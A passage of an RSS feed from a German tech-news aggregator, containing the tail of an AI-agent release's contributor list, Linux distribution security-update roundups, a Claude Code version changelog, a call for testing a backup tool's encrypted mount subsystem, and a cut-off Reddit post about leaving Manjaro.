data-octo-dimensions="link_type:self" href="https://github.com/hueilau">@hueilau</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iamfoz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iamfoz">@iamfoz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ilonagaja509-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ilonagaja509-glitch">@ilonagaja509-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InB4DevOps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InB4DevOps">@InB4DevOps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/indigokarasu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/indigokarasu">@indigokarasu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Interstellar-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Interstellar-code">@Interstellar-code</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iqdoctor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iqdoctor">@iqdoctor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iRonin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iRonin">@iRonin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JabberELF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JabberELF">@JabberELF</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jacevys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jacevys">@jacevys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackey8616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackey8616">@jackey8616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackjin1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackjin1997">@jackjin1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jdelmerico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jdelmerico">@jdelmerico</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jfuenmayor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jfuenmayor">@jfuenmayor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jiahui-Gu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jiahui-Gu">@Jiahui-Gu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimLiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimLiu">@JimLiu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joe102084/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joe102084">@joe102084</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnC1009/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnC1009">@JohnC1009</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpol01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpol01">@jonpol01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jpalmer95/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jpalmer95">@Jpalmer95</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Julientalbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Julientalbot">@Julientalbot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justemu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justemu">@justemu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justincc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justincc">@justincc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jvinals/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jvinals">@jvinals</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/karthikeyann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/karthikeyann">@karthikeyann</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kasunvinod/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kasunvinod">@kasunvinod</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kchuang1015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kchuang1015">@kchuang1015</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kenyonxu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kenyonxu">@kenyonxu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/khungate/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/khungate">@khungate</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kiranvk-2011/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kiranvk-2011">@kiranvk-2011</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kjames2001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kjames2001">@kjames2001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kpadilha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kpadilha">@kpadilha</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kriscolab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kriscolab">@kriscolab</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krislidimo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krislidimo">@krislidimo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kronexoi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kronexoi">@kronexoi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunci115/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunci115">@kunci115</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kylejeong2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kylejeong2">@Kylejeong2</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kylekahraman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kylekahraman">@kylekahraman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LaPhilosophie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LaPhilosophie">@LaPhilosophie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leeseoki0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leeseoki0">@leeseoki0</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lemassykoi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lemassykoi">@lemassykoi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lempkey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lempkey">@Lempkey</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonJS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonJS">@LeonJS</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lidge-jun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lidge-jun">@lidge-jun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LifeJiggy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LifeJiggy">@LifeJiggy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LizerAIDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LizerAIDev">@LizerAIDev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loicnico96/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loicnico96">@loicnico96</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>, @m0n3r0, @malaiwah, @matthewlai, @mavrickdeveloper, @maxmilian, @McClean-Edison, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/memosr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/memosr">@memosr</a>,<br>
@Mind-Dragon, @momowind, @MoonJuhan, @MoonRay305, @moortekweb-art, @MorAlekss, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ms-alan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ms-alan">@ms-alan</a>, @Nami4D,<br>
@nehaaprasaad, @nekwo, @nftpoetrist, @NickLarcombe, @nidhi-singh02, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Niraven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Niraven">@Niraven</a>, @nnnet, @noctilust, @novax635,<br>
@nthrow, @nv-kasikritc, @nycomar, @OCWC22, @oemtalks, @OmX, @ooovenenoso, @orcool, @oseftg, @outsourc-e,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @Paperclip, @PaTTeeL, @pepelax, @phoenixshen, @Pluviobyte, @pnascimento9596, @pochi-gio, @pr7426,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>, @Prithvi1994, @psionic73, @ptichalouf, @Que0x, @QuenVix, @quocanh261997, @qWaitCrypto, @Qwinty,<br>
@r266-tech, @rak135, @rdasilva1016-ui, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roadhero/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roadhero">@roadhero</a>, @rodrigoeqnit, @RonHillDev, @roycepersonalassistant,<br>
@rudi193-cmd, @RyanRana, @sadiksaifi, @samahn0601, @samggggflynn, @SamuelZ12, @sanghyuk-seo-nexcube,<br>
@Saurav0989, @savanne-kham, @Schrotti77, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Schwartz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Schwartz10">@Schwartz10</a>, @SerenityTn, @sgtworkman, @sharziki, @shaun0927,<br>
@shellybotmoyer, @shunsuke-hikiyama, @SimbaKingjoe, @SimoKiihamaki, @sir-ad, @Slimydog21, @slowtokki0409,<br>
@Soju06, @someaka, @soynchux, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a>, @Stark-X, @steezkelly, @stepanov1975, @stephenschoettler,<br>
@stevehq26-bot, @steveonjava, @Strontvod, @subtract0, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sunil123135/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sunil123135">@Sunil123135</a>, @superearn-fisher, @Sylw3ster, @tchanee,<br>
@that-ambuj, @thedavidmurray, @TheOnlyMika, @therahul-yo, @thewillhuang, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ticketclosed-wontfix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ticketclosed-wontfix">@ticketclosed-wontfix</a>, @Timur00Kh,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomqiaozc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomqiaozc">@tomqiaozc</a>, @Tosko4, @Tranquil-Flow, @tw2818, @uzunkuyruk, @vaddisrinivas, @vanthinh6886, @vgocoder,<br>
@victorGPT, @vynxevainglory-ai, @waefrebeorn, @walli, @wangpuv, @wanwan2qq, @wesleysimplicio, @worlldz,<br>
@wpengpeng168, @WuKongAI-CMU, @wuli666, @Wysie, @wysie, @xxxigm, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yannsunn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yannsunn">@yannsunn</a>, @YanzhongSu, @YarrowQiao, @ygd58,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YLChen-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YLChen-007">@YLChen-007</a>, @yoniebans, @yu-xin-c, @YuanHanzhong, @zapabob, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zccyman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zccyman">@zccyman</a>, @ziliangpeng, @zwolniony, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zyrixtrex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zyrixtrex">@Zyrixtrex</a></p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.5.16...v2026.5.28">v2026.5.16...v2026.5.28</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), Debian (krb5, roundcube, starlette, unbound, and varnish), Fedora (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex...]]></description>
<link>https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 28 May 2026 15:09:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), <b>Debian</b> (krb5, roundcube, starlette, unbound, and varnish), <b>Fedora</b> (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, perl-Imager, poppler, python-uv-build, rrdtool, rust-astral-tokio-tar, rust-astral_async_http_range_reader, rust-astral_async_zip, uv, and xen), <b>Oracle</b> (.NET 10.0, .NET 9.0, glibc, ruby:3.3, and thunderbird), <b>Red Hat</b> (.NET 10.0, .NET 8.0, .NET 9.0, containernetworking-plugins, gvisor-tap-vsock, podman, runc, and skopeo), <b>SUSE</b> (agama, alloy, bubblewrap, cockpit, cups, dnsmasq, emacs, glibc, gnutls, go1.25, go1.25-openssl, go1.26, go1.26-openssl, google-guest-agent, hplip, ibus-rime, librime, kernel, libarchive, libzypp, nginx, openexr, openssh, php7, postgresql14, postgresql15, postgresql16, python311-pytest-html, redis, redis7, rsync, tree-sitter, valkey, xen, and yq), and <b>Ubuntu</b> (cableswig, commons-beanutils, dnsmasq, ffmpeg, foomuuri, gst-plugins-good1.0, libcaca, libgcrypt20, mediawiki, memcached, papers, postorius, tgt, and tika).]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.153]]></title>
<description><![CDATA[What's changed

Added skipLfs option to github/git plugin marketplace sources to skip Git LFS downloads during clone and update
Claude Code now shows a one-time notice when your npm global install can't auto-update; /doctor lists the fixes
Status line commands now receive COLUMNS and LINES enviro...]]></description>
<link>https://tsecurity.de/de/3552736/downloads/v21153/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552736/downloads/v21153/</guid>
<pubDate>Thu, 28 May 2026 03:01:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>skipLfs</code> option to <code>github</code>/<code>git</code> plugin marketplace sources to skip Git LFS downloads during clone and update</li>
<li>Claude Code now shows a one-time notice when your npm global install can't auto-update; <code>/doctor</code> lists the fixes</li>
<li>Status line commands now receive <code>COLUMNS</code> and <code>LINES</code> environment variables so scripts can size output to the terminal width</li>
<li><code>claude agents</code>: autocomplete in the dispatch input now suggests native slash commands and bundled skills, not just project skills</li>
<li><code>claude agents</code>: PR column now shows <code>PR #N</code> for a single PR or <code>N PRs</code> for multiple</li>
<li><code>claude doctor</code> now shows the result of your last update attempt</li>
<li>Combined the separate "needs authentication" startup notifications for MCP servers and connectors into a single message</li>
<li>macOS: background agents now appear as "Claude Code" in Privacy &amp; Security and keep their permission grants across upgrades</li>
<li>Fixed stateful MCP servers without the optional GET SSE stream reconnect-looping on <code>tools/list</code> (regression in v2.1.147)</li>
<li>Fixed a regression where a custom API gateway could receive the user's Anthropic OAuth credential instead of the gateway's own token</li>
<li>Fixed subagent (Agent tool) frontmatter MCP servers ignoring <code>--strict-mcp-config</code>, <code>--bare</code>, remote mode, enterprise managed MCP config, and managed-settings MCP server allow/deny policies</li>
<li><code>--strict-mcp-config</code> no longer strips inline <code>mcpServers</code> from explicitly-passed agent definitions (<code>--agents</code> / SDK <code>agents</code>), and blocked subagent MCP servers now surface a visible warning</li>
<li>Fixed the Windows PowerShell installer reporting "Installation complete!" when installation actually failed</li>
<li>Fixed <code>claude update</code> installing the latest version instead of the configured release channel's version for npm installations</li>
<li>Fixed excessive memory usage (multiple GB) when resuming a session by transcript file path on machines with many stored sessions</li>
<li>Fixed <code>claude agents</code> and <code>claude --bg</code> running on a stale daemon started before binary-takeover support, even after upgrading</li>
<li>Fixed a hang where the CLI could fail to exit when stdin was closed without EOF in stream-json mode, leaving a stale session marker behind</li>
<li>Fixed malformed <code>file://</code> links in Claude's responses not being clickable in the terminal</li>
<li>Fixed <code>claude --help</code> rendering unwrapped output on terminals narrower than 92 columns</li>
<li>Fixed MCP tool progress notifications not rendering in the collapsed tool view</li>
<li>Fixed <code>Agent</code> tool with <code>subagent_type: 'claude'</code> running in an undocumented temporary worktree, which could silently discard outputs written to gitignored paths</li>
<li><code>/bg</code> while Claude is responding now continues the response in the background session instead of dropping it</li>
<li>Fixed <code>/btw</code> keyboard shortcuts becoming unresponsive in background sessions while a task is running</li>
<li>Fixed background sessions writing temp files to <code>$CLAUDE_JOB_DIR</code> triggering a "sensitive file" permission prompt</li>
<li>Fixed recovering a background agent whose working directory was deleted showing a truncated stack trace instead of a clear error message</li>
<li>Fixed <code>EnterWorktree</code> not being available immediately in background sessions (previously required <code>ToolSearch</code> first)</li>
<li>Fixed <code>cmd+k</code> in iTerm2/Terminal.app not repainting attached background sessions</li>
<li>Fixed the IME candidate window appearing at the bottom of the screen instead of next to the input caret in attached background sessions on Windows</li>
<li>Fixed background-color bleed when attaching to a background agent from 256-color-only terminals after the agent had rendered file diffs</li>
<li>Fixed <code>/copy</code> and copy-on-select silently failing to update the system clipboard when attached to a background session inside tmux</li>
<li>Fixed opening <code>claude agents</code> with Remote Control enabled leaving zombie session entries on the Code tab after exiting</li>
<li>Fixed <code>/rename</code> in background sessions not updating the session banner immediately</li>
<li>Fixed Windows update rollback: if a Windows update fails, Claude Code now restores the original executable by copy and tells you how to recover</li>
<li>[VSCode] Fixed Claude Code processes not shutting down cleanly when VS Code closed on Windows, causing false "unclean exit" reports and orphaned MCP servers</li>
<li><code>/model</code> now saves your selection as the default for new sessions (matching the IDE). Press <code>s</code> in the picker to switch models for the current session only.</li>
<li>If you customized the <code>modelPicker:setAsDefault</code> keybinding, rename it to <code>modelPicker:thisSessionOnly</code> in keybindings.json (the <code>d</code> action was replaced by <code>s</code>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Back In Time 2.0.0: Call for testing – new mount subsystem with full gocryptfs support]]></title>
<description><![CDATA[The mount subsystem for Back In Time was re-written from scratch now offering full support for gocryptfs as replacement for EncFS for encrypted backups. The new mount subsystem is ready for broader testing. ☢️ CAUTION: Please do NOT test with production backups. 🔗 Installation & testing instructi...]]></description>
<link>https://tsecurity.de/de/3552654/linux-tipps/back-in-time-200-call-for-testing-new-mount-subsystem-with-full-gocryptfs-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552654/linux-tipps/back-in-time-200-call-for-testing-new-mount-subsystem-with-full-gocryptfs-support/</guid>
<pubDate>Thu, 28 May 2026 01:36:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>The mount subsystem for <a href="https://github.com/bit-team/backintime">Back In Time</a> was re-written from scratch now offering full support for gocryptfs as replacement for EncFS for encrypted backups. The new mount subsystem is ready for broader testing.</p> <p>☢️ CAUTION: Please do NOT test with production backups.</p> <p>🔗 <a href="https://github.com/bit-team/backintime/pull/2449#issuecomment-4534635028">Installation &amp; testing instructions</a></p> <p>🌱 Branch: `feat/sshgocryptfs`</p> <p>Thanks in advance.</p> <p>Back In Time is an end-user desktop backup software using rsync in the back. It is <a href="https://www.reddit.com/r/FOSS">r/FOSS</a> with no company behind it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/buhtz"> /u/buhtz </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tp2hea/back_in_time_200_call_for_testing_new_mount/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tp2hea/back_in_time_200_call_for_testing_new_mount/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, buildah, compat-libtiff3, compat-openssl11, containernetworking-plugins, crun, delve, dnsmasq, dovecot, edk2, firefox, freeipmi, gdk-pixbuf2, giflib, git-lfs, glib2, go-fdo-client, go-fdo-server, golang, grafana, grafana-pcp, gstreamer1-plugin...]]></description>
<link>https://tsecurity.de/de/3551251/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551251/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 27 May 2026 15:28:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, buildah, compat-libtiff3, compat-openssl11, containernetworking-plugins, crun, delve, dnsmasq, dovecot, edk2, firefox, freeipmi, gdk-pixbuf2, giflib, git-lfs, glib2, go-fdo-client, go-fdo-server, golang, grafana, grafana-pcp, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, and gstreamer1-plugins-ugly-free, iputils, jq, kernel, krb5, libcap, LibRaw, libsndfile, libsoup, libsoup3, libssh, libtiff, libvirt, linux-sgx, luksmeta, mingw-glib2, NetworkManager, nginx, nginx:1.24, nginx:1.26, openexr, openssh, openssl, opentelemetry-collector, p11-kit, PackageKit, podman, python-jwcrypto, python-markdown, python-tornado, python3.11, python3.12, python3.14, python3.9, qemu-kvm, rsync, skopeo, sudo, systemd, thunderbird, tomcat, unbound, vim, xorg-x11-server, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Debian</b> (imagemagick, kdenlive, memcached, node-shell-quote, and samba), <b>Fedora</b> (chromium, curl, editorconfig, haproxy, perl-Crypt-DSA, perl-HTTP-Tiny, poppler, rust-afterburn, rust-coreos-installer, rust-eif_build, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-sqv, and uriparser), <b>Oracle</b> (compat-libtiff3, dnsmasq, firefox, freeipmi, kernel, and uek-kernel), <b>Slackware</b> (mozilla), <b>SUSE</b> (assimp, firefox, glibc, gnutls, go1.25-openssl, go1.26-openssl, kernel, kubevirt, leancrypto, libarchive, libsndfile, mcphost, nginx, openssh, podman, python-GitPython, rsync, and samba), and <b>Ubuntu</b> (ayttm, dnsmasq, libssh2, linux-azure, linux-azure, linux-azure-6.17, linux-iot, linux-lowlatency-hwe-5.15, ngtcp2, onnx, opencc, protobuf, python-git, samba, xdg-dbus-proxy, and xmlrpc-c).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3549884/unix-server/security-zwei-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549884/unix-server/security-zwei-probleme-in-rsync-suse/</guid>
<pubDate>Wed, 27 May 2026 07:46:12 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Bye Manjaro. It's been real...]]></title>
<description><![CDATA[So I know the past few years have brought a lot of Manjaro hate, but I proudly plodded on, choosing to ignore the rhetoric, given my history of more than 10 years of continuous use. My primary install topped out at over 7 years, despite the drive itself moving between 3 different laptops, and bei...]]></description>
<link>https://tsecurity.de/de/3548947/linux-tipps/bye-manjaro-its-been-real/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548947/linux-tipps/bye-manjaro-its-been-real/</guid>
<pubDate>Tue, 26 May 2026 20:08:40 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So I know the past few years have brought a lot of Manjaro hate, but I proudly plodded on, choosing to ignore the rhetoric, given my history of more than 10 years of continuous use. My primary install topped out at over 7 years, despite the drive itself moving between 3 different laptops, and being cloned/moved via rsync from an HDD to an mSATA drive, then an SSD, then a 256GB NVME, before finally settling on my current 512GB NVME, where it stayed until about a month ago when I decided to take a swing at Artix Linux. Despite moving my main install, I kept Manjaro along silently, but reliably on an oldr laptop used primarily for loca Plex streaming and Syncthing. My relationship with Manjaro officially ended 2 days ago, when I logged on via ssh, ran my usual remote update, then realized my pings were failing. Since that laptop install had been running for quite a while, I actually had the 5.10 LTS kernel running. It turns out that Manjaro decided to change the meta package name for the LTS kernel, which triggered a version update for my 